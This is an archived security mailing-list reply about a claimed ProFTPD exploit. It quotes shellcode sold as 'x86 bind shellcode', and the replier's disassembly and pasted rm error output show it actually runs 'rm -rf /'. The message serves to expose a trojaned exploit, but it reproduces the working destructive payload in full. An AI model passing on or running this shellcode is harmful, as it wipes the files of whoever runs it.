[<prev] [next>] [day] [month] [year] [list]
Message-ID: <200310260546.h9Q5kwBJ066262@mailserver1.hushmail.com>
From: ebh at hushmail.com (ebh@...hmail.com)
Subject: Re: ProFTPD-1.2.9rc2 localhost delete
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Dilema posted the *same* message twice to FD, just because he is a fame
whore.
- --=-QFP9PbcI+zCcGGGTK/wB
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable
Yeah umm thats some sexy shellcode there.
>=20
> /* x86 bind shellcode */
> char sc[]=3D
> "\x31\xc0\x50\x68\x66\x20\x2f\x58\x68\x6d\x20\x2d\x72\x68\x2d"
> "\x63\x58\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41"
> "\x41\x41\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f"
> "\x62\x69\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44"
> "\x24\x23\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24"
> "\x0c\x31\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14"
> "\x31\xdb\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0"
> "\x0b\xcd\x80\x31\xdb\x31\xc0\x40\xcd\x80";
00000002 50 push eax
00000003 6866202F58 push dword 0x582f2066
00000008 686D202D72 push dword 0x722d206d
0000000D 682D635872 push dword 0x7258632d
00000012 6841414141 push dword 0x41414141
00000017 6841414141 push dword 0x41414141
0000001C 6841414141 push dword 0x41414141
00000021 6841414141 push dword 0x41414141
00000026 682F736843 push dword 0x4368732f
0000002B 682F62696E push dword 0x6e69622f
00000030 31C0 xor eax,eax
00000032 88442407 mov [esp+0x7],al
00000036 8844241A mov [esp+0x1a],al
0000003A 88442423 mov [esp+0x23],al
0000003E 89642408 mov [esp+0x8],esp
00000042 31DB xor ebx,ebx
00000044 8D5C2418 lea ebx,[esp+0x18]
00000048 895C240C mov [esp+0xc],ebx
0000004C 31DB xor ebx,ebx
0000004E 8D5C241B lea ebx,[esp+0x1b]
00000052 895C2410 mov [esp+0x10],ebx
00000056 89442414 mov [esp+0x14],eax
0000005A 31DB xor ebx,ebx
0000005C 89E3 mov ebx,esp
0000005E 8D4C2408 lea ecx,[esp+0x8]
00000062 31D2 xor edx,edx
00000064 8D542414 lea edx,[esp+0x14]
00000068 B00B mov al,0xb
0000006A CD80 int 0x80
0000006C 31DB xor ebx,ebx
0000006E 31C0 xor eax,eax
00000071 CD80 int 0x80
## Super Seczy Shellcode ##
rm: cannot remove `//bin': Permission denied =20
rm: cannot remove `//dev': Permission denied =20
rm: cannot remove `//etc': Permission denied
rm: cannot remove `//lib': Permission denied
rm: cannot remove `//mnt': Permission denied=20
rm: cannot remove `//opt': Permission denied
rm: cannot remove `//tmp': Permission denied =20
rm: cannot remove `//sys': Permission denied
rm: cannot remove `//var': Permission denied
rm: cannot remove `//usr': Permission denied
rm: cannot remove `//boot': Permission denied
rm: cannot remove `//home': Permission denied
rm: cannot remove `//proc': Permission denied
rm: cannot remove `//sbin': Permission denied
rm: cannot remove `//root': Permission denied
rm: cannot remove `//share': Permission denied
rm: cannot remove `//.bash_history': Permission denied
rm: cannot remove `//.xauthKbxfnN': Permission denied
rm: cannot remove `//.irssi': Permission denied
- --=20
dilema <dilema@...rs.net>
- --=-QFP9PbcI+zCcGGGTK/wB
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: This is a digitally signed message part
- -----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.2 (GNU/Linux)
iQEVAwUAP5lXx/J/0j5bC9FtAQIudwgAlPlb6YU52Yi3YQe7UAHvzhwNascAbkUk
QjBHQOmrl7mR9jHYx1DfTqDgvJ5C2TfFM2NXNtdm3A7Q8SEzcLb/FdnC9nJWbybk
aDKHwfY6i5Js9F9pdD3pANW7jQ7vpOJc5D9hlL6uaOVyoj39u5KtfqhdW3x22O2l
kHQneM3/FTC8If/c8gcH3wz/DRY9t+wlWddAsafICV0B5N2UwD+d1ipVU3k1PVXE
6KaQuXM1Jx74phlMzjhLpmABvAEC2jZwomk/oy8d7MF/7Hb1SUBC4afzTozB/uSf
0Kcpw69dXvdcVtEyBczMVY7BtfpN3TGyERbQq6kvJ3Z6KnpNadtxlg==
=DCtX
- -----END PGP SIGNATURE-----
- --=-QFP9PbcI+zCcGGGTK/wB--
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.3
wkYEARECAAYFAj+bX70ACgkQ+Po7xVA6AFet0gCgq4LLpp5Q/TWrq5eENmFixc+0R24A
n0tpvddf/bg4/ai9qZnncdJJ3aNL
=yOt4
-----END PGP SIGNATURE-----
Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2
Free, ultra-private instant messaging with Hush Messenger
https://www.hushmail.com/services.php?subloc=messenger&l=434
Promote security and make money with the Hushmail Affiliate Program:
https://www.hushmail.com/about.php?subloc=affiliate&l=427
Powered by blists - more mailing lists